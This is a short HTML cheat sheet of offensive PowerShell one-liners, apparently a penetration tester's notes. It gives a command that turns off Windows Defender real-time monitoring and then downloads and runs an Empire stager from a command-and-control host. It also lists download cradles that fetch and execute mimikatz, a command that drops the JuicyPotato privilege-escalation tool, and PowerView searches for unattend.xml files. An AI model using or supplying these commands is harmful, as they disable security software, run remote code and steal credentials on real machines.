<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Random powershell</title>
</head><body><b><u>This works for disabling Windows Defender and running empire stager:</u></b>&nbsp;<br/>
<br/>
powershell -exec bypass Set-MpPreference -DisableRealtimeMonitoring $true &amp;&amp; cmd &nbsp;/c "powershell -noninteractive -command IEX (New-Object Net.WebClient).DownloadString('http://cloud.c2server.net:81/file2.ps1')"<br/>
<br/>
<u><b>Download Cradle<br/>
</b></u><br/>
(new-object System.Net.Webclient).DownloadString('http://192.168.50.34:8080/mimikatz.exe')<br/>
<br/>
<u><b>Download Cradle and Execute</b></u><br/>
<br/>
(new-object System.Net.Webclient).DownloadString('http://192.168.50.34:8080/mimikatz.ps1') | IEX<br/>
<br/>
<u><b>Download EXE and place it</b></u><br/>
<br/>
IEX (new-object System.Net.Webclient).DownloadFile('http://192.168.50.34:8080/JuicyPotato.exe','C:\users\public\downloads\potato.exe')<br/>
<br/>
<b><u>PowerView - Find interesting files e.g., unattend.xml</u></b><br/>
<br/>
Find-InterestingFile -Path 'C:\' -Include 'unattend*.xml' <br/>
<br/>
Find-InterestingACL<br/>
<br/>
</body></html>